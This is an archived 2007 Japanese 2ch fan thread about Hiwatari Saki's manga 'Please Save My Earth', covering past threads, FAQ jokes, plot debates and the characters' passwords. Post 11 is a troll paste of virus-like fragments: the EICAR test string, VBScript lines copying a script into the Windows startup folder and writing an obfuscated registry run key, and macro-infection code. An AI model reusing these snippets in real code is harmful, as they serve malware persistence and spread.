5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ぼくの地球を守ってを守って&日渡作品すれ 16

1 :花と名無しさん:2007/01/06(土) 02:46:34 ID:9dMTahlC0
わたしたち、ここから・・・
 日渡作品をどこまで見守っていけるでしょうか・・・

前世:ぼくの地球を守って&日渡作品すれ 15
http://comic7.2ch.net/test/read.cgi/gcomic/1161263869/
http://comic6.2ch.net/test/read.cgi/gcomic/1161263869/(12月中に鯖移転あり)

その他の過去スレや既出ループネタ等は>>2-10あたりへと転生

『別冊花とゆめ』 毎月26日発売
「ボクを包む月の光 ―ぼく地球(タマ)次世代編―』を連載中。

別花ドットコム ttp://www.betsuhana.com/
白泉社公式 ttp://www.hakusensha.co.jp/top.shtml
s-book〔既刊コミクスdata〕 ttp://www.s-book.com/plsql/com2_writer?isbn=4592142012

2 :花と名無しさん:2007/01/06(土) 02:47:20 ID:???0
過去ログその1
ぼくの地球を守ってを守って&日渡作品すれ 14
http://comic6.2ch.net/test/read.cgi/gcomic/1155818726/
ぼくの地球を守ってを守って&日渡作品すれ 13
http://comic6.2ch.net/test/read.cgi/gcomic/1147322510/
ぼくの地球を守ってを守って&日渡作品すれ 12
http://comic6.2ch.net/test/read.cgi/gcomic/1140597853/
ぼくの地球を守って を守って&日渡すれ 11
http://comic6.2ch.net/test/read.cgi/gcomic/1129567620/
ぼくの地球を守ってを守って&日渡作品すれ 10
http://comic6.2ch.net/test/read.cgi/gcomic/1122593997/
ぼくの地球を守ってを守って&日渡作品すれ 9
http://comic6.2ch.net/test/read.cgi/gcomic/1117711191/
ぼくの地球を守ってを守って&日渡作品すれ 8
http://comic6.2ch.net/test/read.cgi/gcomic/1110156617/
ぼくの地球を守ってを守って&日渡作品すれ 7
http://comic6.2ch.net/test/read.cgi/gcomic/1098703461/
「ぼくの地球を守って」&日渡早紀作品スレ 6
http://comic6.2ch.net/test/read.cgi/gcomic/1094664471/
「ぼくの地球を守って」&日渡早紀作品スレ 5
http://comic6.2ch.net/test/read.cgi/gcomic/1092886161/
「ぼくの地球を守って」&日渡早紀作品スレ 4
http://comic6.2ch.net/test/read.cgi/rcomic/1071201600/
「ぼくの地球を守って」&日渡早紀作品スレ 3
http://comic.2ch.net/test/read.cgi/rcomic/1063586774/
「ぼくの地球を守って」2&日渡早紀作品スレ
http://comic.2ch.net/test/read.cgi/rcomic/1039846251/

3 :花と名無しさん:2007/01/06(土) 02:47:41 ID:???0
過去ログその2
『ぼくの地球を守って』。略して『ぼくたま』!
http://comic.2ch.net/test/read.cgi/rcomic/1013527101/
ぼくの地球をまもって
http://piza.2ch.net/gcomic/kako/960/960566824.html
「ぼく地球」の迅八はなんで人気がないの?
http://piza.2ch.net/log2/gcomic/kako/956/956085727.html
逝かないで、日渡先生!! #3
http://comic.2ch.net/test/read.cgi/gcomic/1007135020/
もうだめです!日渡先生!!#2
http://comic.2ch.net/test/read.cgi/gcomic/988778637/
もうだめです!日渡先生!!
http://salad.2ch.net/gcomic/kako/977/977080044.html

関連スレ:さぁて今号の別冊花とゆめ・ザ花とゆめ5号
http://comic7.2ch.net/test/read.cgi/gcomic/1161686055/

4 :既出ネタ: 1:2007/01/06(土) 02:48:16 ID:???0
さんざん既出のループネタその1

Q:紫苑と木蓮は何回ヤリましたか?
A:一発説と灰になるまで説があります。

Q:蓮は水子って本当ですか?
A:月基地から春と作者にのみ届いている
  強力電波の可能性が高いです。

Q:何故木蓮のキチェは消えなかったの?
A:知りません。サージャリムとビワタリ神のみ知る 思し召しです。

Q:あれはレイプ?和姦?
A1:夫婦間でも拒絶した事実があればレイプになるので、レイプでしょう。
ただ、木蓮が紫苑をかばう為にあれは合意だったと後から申告したので、
結果的に紫苑はお咎めナシになっただけ。
A2:簡潔に【イヤよイヤよも好きの内】

Q:アニメが中途半端でおわってしまうんですが・・・。
A1:仕様です。諦めましょう・・
A2:あなたの再生機は壊れていませんか?
  もう一度、植物がはびこっていないか
  お確かめの上、おかけ直し下さいw

5 :既出ネタ: 2:2007/01/06(土) 02:50:07 ID:???0
ループネタその2

Q:月基地の人間は小人サイズという設定ですが、地球の野菜やマンガが
そのままの大きさなのはなぜですか?
A:物の大きさをコントロールできるドラ○もんのような道具があるのです。

Q:じゃあなぜ月基地は地球人に発見されないのですか?
A:地球人がバ(ry

記憶鮮明シリーズの時間軸は
ぼく地球本編→2年後=偶然が残すもの(記憶鮮明2)
→さらに数年後=ぼく地球の最終話→現在進行中のボク月
(記憶鮮明文庫版あとがきによる)

EPIAがらみの話はみんな記憶鮮明シリーズです。
なお、実写化がらみのネタは荒れるもとなのでほどほどに。

----------------------------------------------------------
以上。
一応過去スレ2〜3チェックして立てましたが、最新スレはあまり見てなかったので
ミス等ありましたら、訂正・補足をお願い。ヨロ。

6 :オマケ:2007/01/06(土) 03:20:45 ID:???0
某所にてハケーンした、AA倉庫
ビワタリページ→ttp://www23.atwiki.jp/mangaaa/tag/%E6%97%A5%E6%B8%A1%E6%97%A9%E7%B4%80

マンガ総合AA(アスキーアート)保管庫 @ ウィキ
ttp://www23.atwiki.jp/mangaaa/pages/1.html

7 :花と名無しさん:2007/01/06(土) 09:23:54 ID:???0
>>1
乙です。

既出ネタのこの二つはそろそろ修正してもいいかもね。
とりあえず案を出しますので訂正ヨロ。

Q:紫苑と木蓮は何回ヤリましたか?
A:一発説と灰になるまで説があります。
→ありすが襲うまで輪は前世のレイープを気にして手は出さなかったようですが、
 だからといって紫苑もあの一回限りだったのかはやはり不明なままです。
 あの一発で妊娠ってのもそれはそれですごいですが。

Q:蓮は水子って本当ですか?
A:月基地から春と作者にのみ届いている
  強力電波の可能性が高いです。
→蓮の前世の記憶によるとそれでFAのようです。

8 :花と名無しさん:2007/01/06(土) 11:05:14 ID:???0
 \       \                 |               ,
   \       \             _/  |      ̄ ̄ ̄ ̄ ̄'  /
    \        \             |             /
      \        \           |            /
         /       /         |          /
       /       /           |        /
      /       /            |        (          、
   _/      _/                _|      `-,________|


9 :花と名無しさん:2007/01/06(土) 12:11:38 ID:???O
>>1
スレ立て、乙。(´ー`)つ旦~

10 :花と名無しさん:2007/01/06(土) 12:17:19 ID:???0
スレ立て乙です。
>>7も乙。

11 :花と名無しさん:2007/01/06(土) 17:08:04 ID:???0
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


12 :花と名無しさん:2007/01/07(日) 23:13:12 ID:???0
前スレもそうだけど
なんでウィルスはるのかねぇ…

13 :花と名無しさん:2007/01/07(日) 23:52:10 ID:???0
>>12
板全体に出没している粘着であって、このスレへの嫌がらせでは
ないので完全スルーヨロ。(正確には本物のウィルスではないし)

14 :花と名無しさん:2007/01/08(月) 12:30:33 ID:???0
>1 乙華麗様

専ブラだけどブラウザで見るとどうなるのか心配。

15 :花と名無しさん:2007/01/09(火) 02:23:37 ID:???O
>>1
つアニメ版スレもよろしく

【輪廻】ぼくの地球を守って【転生】
http://anime.2ch.net/test/read.cgi/ranime/1145045478/

16 :花と名無しさん:2007/01/10(水) 03:10:19 ID:???O
冬休みが終わったせい?めちゃめちゃ住人が減ったような…

17 :花と名無しさん:2007/01/10(水) 12:56:58 ID:???O
>>15
見てきたけどこんなのあるんだ

「ぼくの地球を守ってTVシリーズ化」
ttp://www.tanomi.com/metoo/naiyou.html?kid=1978

18 :花と名無しさん:2007/01/11(木) 03:31:13 ID:???O
次号のボク月は通常連載だったかなぁ?うろ覚え。
蓮が友達と色々交流してる小学生の日常なら、そこそこ面白いんだけど…
背後霊の如く紫苑と木蓮の描写や助けがなければね。

19 :花と名無しさん:2007/01/13(土) 04:14:07 ID:???O
即死防止

20 :花と名無しさん:2007/01/15(月) 15:14:01 ID:???O
需要なくなったかな?

21 :花と名無しさん:2007/01/15(月) 15:57:07 ID:???0
また花ゆめが出たら戻ってくるんじゃない?

22 :花と名無しさん:2007/01/15(月) 17:33:34 ID:???0
まぁボク月に関しては、語ることはほとんどないからなw
旧作ぼく地球に関して語り出すと、ループ議論になってしまうが。

23 :花と名無しさん:2007/01/15(月) 21:29:29 ID:NAG2p37S0
なにかあったら素でショック死する。

24 :花と名無しさん:2007/01/15(月) 23:53:38 ID:???0
アクマくんシリーズの最終構想が気になる

魔法ビターの頃の絵に文字説明だけで1冊にできないものか
文庫化の頃にリクエストしとけば2〜3ページでやってくれたんだろうか?


25 :花と名無しさん:2007/01/18(木) 01:10:40 ID:???O
オーラの泉
劇団ひとりの
守護霊のひとり
宇宙人…

これ聞いた瞬間
ぼく球思い出したよ

26 :花と名無しさん:2007/01/18(木) 11:40:47 ID:???0
リアルありす
http://www.sankei.co.jp/chiho/saitama/070118/stm070118001.htm


27 :花と名無しさん:2007/01/18(木) 11:43:04 ID:???0
>>25
守護霊に宇宙人ってあるのが驚きだw
江原も眉唾に思えてきた

28 :花と名無しさん:2007/01/18(木) 13:55:56 ID:???O
>>27
何を今更w

29 :花と名無しさん:2007/01/18(木) 17:51:05 ID:???0
すごーく下世話なんだけど、木蓮事件でのハレルヤって、
まさか・・・紫苑がイッちゃった時の感想じゃないだろうな(´・ω・`;

30 :花と名無しさん:2007/01/18(木) 18:10:40 ID:???0
>>29
それが元で蓮の前世が誕生したのだと思えばそんなに下世話でもないかも。
木蓮の妊娠設定は後づけなのかどうか気になる所。

31 :花と名無しさん:2007/01/19(金) 05:53:38 ID:???0
どーみても後付けでは。

32 :花と名無しさん:2007/01/21(日) 11:58:52 ID:???O
ミクロが笠間にあげた熱帯魚の本、内容がちゃんとしているんだが、普通余白か最後の頁に参考にした書籍として名を記載するけどどこにも書いてないんだよね。
まさか、許可なしにパクったってことはないよな?


33 :花と名無しさん:2007/01/21(日) 19:41:51 ID:???O
そんくらいいいじゃん。

地球の絵を書くのに参考にしたニュートン
燃やされた寺や東京駅の写真
タワーの外観
風景
こんなんと一緒かと。

あの本から引用があるわけでもない、メモ挟んで渡すための小道具だから、正直どうでもいい。
せいんとせーやのほうが問題ありじゃね?

34 :花と名無しさん:2007/01/22(月) 10:06:34 ID:???0
確かに。
著作権侵害してまで同人誌のようなおちゃらけをする必然性は無かったな。

35 :花と名無しさん:2007/01/22(月) 13:19:06 ID:???0
ボク月での、モー娘 → メー娘 の置き換えや、ハリーポッターの伏せ字が激しく不快。
ネットの中傷書き込みじゃないんだから、堂々と書け。障りがあるのなら最初から使うな。


36 :花と名無しさん:2007/01/23(火) 10:02:43 ID:???O
唐突にゴメン。

メンバーのパスワード覚えてる人いたら教えて
『夢に楽土求めたり』『木鬼のお守りはもうごめん』しか浮かばない…


37 :花と名無しさん:2007/01/23(火) 10:47:08 ID:???0
パスワードを集めるだって?リーダーとして許すわけにはいかん。

つドゾー
ザイ=テス=シ=オン
早くどこかに帰りたい
木蓮を永遠に愛す
玉蘭のそばにいたい
オク=タコ=サノール=ヒイ=ラギ

38 :花と名無しさん:2007/01/23(火) 14:37:45 ID:???O
>37ああ!(・∀・)ソレダ!ありがd!!すっきりした
>オク=タコ=サノール=ヒイ=ラギ
ちょい吹いたw懐かしー

さすがリーダーw仕事が早い
ドゾーつ弟

39 :花と名無しさん:2007/01/23(火) 15:01:16 ID:???0
柊って他の6人の誰とも親密な関係が無くて、浮いてるよね。

40 :花と名無しさん:2007/01/23(火) 15:25:14 ID:???0
>>39
メンバーに決まる前は誰とも面識がなかったって意味では木蓮と一緒なのにね。
やはり顔とキチェスというインパクトの違いか…。

41 :花と名無しさん:2007/01/23(火) 15:31:02 ID:???0
>>37>>38
パスワードは2回書き換えがあって、確か紫苑とエンジュの最初二つは

ハヤクボセイニカエリタイ→ハヤクコキョウニカエリタイ
ギョク=ラン→ギョク=ラン アイシテル

と変わってたような。そうすると玉蘭もなんかありそうだけど思い出せない。

>>39
だからこそ大介は変に性格が歪められる事も無くて良かったと、
そう思っていた時期が私にもありました。

42 :花と名無しさん:2007/01/24(水) 02:37:52 ID:???0
当時、キィワードちゃうやろ!パスワードだろ!
と、こっそり漫画に向かって突っ込んでました(´ω`)

15 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)